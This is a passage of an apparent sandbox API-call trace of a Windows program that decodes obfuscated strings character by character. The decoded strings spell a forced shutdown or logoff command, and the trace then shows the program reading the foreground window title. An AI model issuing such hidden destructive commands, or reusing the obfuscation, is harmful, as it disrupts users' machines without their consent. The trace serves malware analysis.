pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.609] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.609] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.609] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0201.609] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.610] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.610] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0201.610] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.610] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.611] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.611] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.611] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.611] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.612] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.612] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0201.612] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.612] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.612] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.613] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0201.613] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.613] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.613] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0201.614] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.614] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.614] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.614] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0201.615] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.615] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.615] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.615] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.616] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.616] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.616] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.616] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.617] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.617] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.617] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0201.618] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.619] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.619] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.619] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.619] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.620] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.620] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.620] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.620] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.621] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.621] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.621] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0201.621] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.622] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.622] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.623] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.623] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0201.623] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.624] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.624] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.624] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.625] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.625] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.625] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.625] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.626] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.626] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0ce, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.627] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0201.627] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.627] GetForegroundWindow () returned 0x2035c [0201.627] GetLastError () returned 0x0 [0201.628] SysStringLen (param_1=" ") returned 0xff [0201.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0201.628] SysStringLen (param_1=" ") returned 0xff [0201.628] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0201.628] GetWindowTextA (in: hWnd=0x2035c, lpString=0x11644c4, nMaxCount=255 | out: lpString="Desktop") returned 7 [0201.628] GetLastError () returned 0x0 [0201.628] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.628] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0201.629] SysStringByteLen (bstr="敄歳潴p††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0201.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Desktop", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Desktop") returned 256 [0201.629] SysStringLen (param_1="Deskt") returned 0x5 [0201.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Deskt", cchWideChar=6, lpMultiByteStr=0x116854c, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deskt", lpUsedDefaultChar=0x0) returned 6 [0201.630] SetWindowTextA (hWnd=0x103c4, lpString="Deskt") returned 1 [0201.630] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x7 [0201.630] GetFocus () returned 0x0 [0201.630] lstrlenA (lpString="Deskt") returned 5 [0201.630] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x116854c) returned 0x1 [0201.631] IsWindow (hWnd=0x103c4) returned 1 [0201.631] IsWindow (hWnd=0x103c4) returned 1 [0201.631] IsWindow (hWnd=0x103c4) returned 1 [0201.631] IsWindow (hWnd=0x103c4) returned 1 [0201.632] GetFocus () returned 0x0 [0201.632] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0201.632] GetFocus () returned 0x0 [0201.632] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x6) returned 0x10ebcd0 [0201.632] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x6, lParam=0x10ebcd0) returned 0x5 [0201.632] GetFocus () returned 0x0 [0201.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Deskt", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 6 [0201.633] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Deskt", cbMultiByte=-1, lpWideCharStr=0x116854c, cchWideChar=6 | out: lpWideCharStr="Deskt") returned 6 [0201.633] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0201.633] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x2 [0201.635] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="_", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="_\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.635] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="R", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="R") returned 1 [0201.635] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.636] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.636] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.636] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0201.636] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.637] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.637] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.637] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0201.637] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.638] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.638] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.638] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0201.638] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.639] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.639] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.639] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0201.639] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.640] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0201.640] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.640] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.641] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.641] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0201.641] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.641] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.642] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.642] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0201.642] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.642] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.642] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0201.643] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.643] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.643] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.643] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0201.644] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.644] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.644] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.644] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0201.644] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.645] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.645] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.645] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0201.645] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0201.646] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0201.646] VarSub (in: pvarLeft=0x28f1e8, 